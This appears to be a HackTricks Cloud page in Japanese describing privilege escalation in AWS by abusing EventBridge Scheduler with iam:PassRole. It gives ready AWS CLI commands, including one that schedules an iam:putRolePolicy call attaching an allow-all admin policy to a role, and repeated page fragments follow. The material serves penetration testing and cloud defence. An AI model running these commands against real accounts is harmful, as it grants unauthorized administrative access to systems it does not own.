AWS - EventBridge Scheduler Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

EventBridge Scheduler

EventBridge Schedulerは、さまざまなAWSサービスへの呼び出しをスケジュールすることで特権昇格に使用できます。スケジュールに基づいてサービスを呼び出す能力を活用することで、十分な権限を持つユーザーは特権を昇格させることができます。EventBridge Schedulerがテンプレート化されたターゲットを使用してトリガーできる主なアクションは以下の通りです：

Lambda: lambda:InvokeFunction - スケジュールに従ってLambda関数を呼び出します。
CodeBuild: codebuild:StartBuild - AWS CodeBuildプロジェクトを開始します。
CodePipeline: codepipeline:StartPipelineExecution - AWS CodePipelineの実行をトリガーします。
ECS: ecs:RunTask - ECSタスクを実行します。
EventBridge: events:PutEvents - EventBridgeにイベントを送信します。
Inspector: inspector:StartAssessmentRun - Amazon Inspectorの評価を開始します。
Kinesis: kinesis:PutRecord - Kinesisストリームにレコードを送信します。
Firehose: firehose:PutRecord - Firehose配信ストリームにレコードを送信します。
SageMaker: sagemaker:StartPipelineExecution - SageMakerパイプラインの実行を開始します。
SNS: sns:Publish - SNSトピックにメッセージを公開します。
SQS: sqs:SendMessage - SQSキューにメッセージを送信します。
Step Functions: states:StartExecution - AWS Step Functionsの実行を開始します。

これらはEventBridge Schedulerが実行できるテンプレート化されたアクションの一部に過ぎません。しかし、ユニバーサルターゲットを使用することで、AWSサービス全体で多くの他のアクションを呼び出すことができます。ユニバーサルターゲットは、テンプレート化されたリストを超えたより広範なAPI操作を可能にします。

EventBridge Schedulerの詳細については：

AWS - EventBridge Scheduler Enum

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)

sts:AssumeRole、iam:PassRole、およびscheduler:CreateScheduleまたはscheduler:UpdateScheduleの権限を持つユーザーは、EventBridge Schedulerを利用して、より高い権限を持つロールを使用してサービスを呼び出すことで特権を昇格させることができます。

これらの権限を持つ攻撃者は、昇格された権限を持つロールを引き受け、そのロールをEventBridge Schedulerに渡してスケジュールを作成または更新できます。スケジュールは、Lambda関数の呼び出し、ECSタスクの開始、CodePipelineの実行のトリガー、またはEventBridge Schedulerがサポートする270のAWSサービスのいずれかの操作を実行するように構成できます。これらのアクションをスケジュールすることで、攻撃者は高い権限を悪用してAWSサービス全体で不正な操作を行うことができます。 \

例えば、彼らはスケジュールを設定して、テンプレート化されたアクションであるLambda関数を呼び出すことができます：

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

EventBridge Schedulerでは、テンプレート化されたサービスアクションに加えて、さまざまなAWSサービスのAPI操作を呼び出すためにユニバーサルターゲットを使用できます。ユニバーサルターゲットは、ほぼすべてのAPIを呼び出す柔軟性を提供します。1つの例は、「putRolePolicy」ポリシーを持つロールを使用して「AdminAccessPolicy」を追加するユニバーサルターゲットを使用することです。

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

参考文献

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。

PreviousAWS - EMR Privesc NextAWS - Gamelift

Last updated 1 day ago

EventBridge Scheduler

Lambda: lambda:InvokeFunction - スケジュールに従ってLambda関数を呼び出します。

CodeBuild: codebuild:StartBuild - AWS CodeBuildプロジェクトを開始します。

CodePipeline: codepipeline:StartPipelineExecution - AWS CodePipelineの実行をトリガーします。

ECS: ecs:RunTask - ECSタスクを実行します。

EventBridge: events:PutEvents - EventBridgeにイベントを送信します。

Inspector: inspector:StartAssessmentRun - Amazon Inspectorの評価を開始します。

Kinesis: kinesis:PutRecord - Kinesisストリームにレコードを送信します。

Firehose: firehose:PutRecord - Firehose配信ストリームにレコードを送信します。

SageMaker: sagemaker:StartPipelineExecution - SageMakerパイプラインの実行を開始します。

SNS: sns:Publish - SNSトピックにメッセージを公開します。

SQS: sqs:SendMessage - SQSキューにメッセージを送信します。

Step Functions: states:StartExecution - AWS Step Functionsの実行を開始します。

EventBridge Schedulerの詳細については：

AWS - EventBridge Scheduler Enum

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

例えば、彼らはスケジュールを設定して、テンプレート化されたアクションであるLambda関数を呼び出すことができます：

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

EventBridge Scheduler

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

参考文献

EventBridge Scheduler

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

参考文献

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)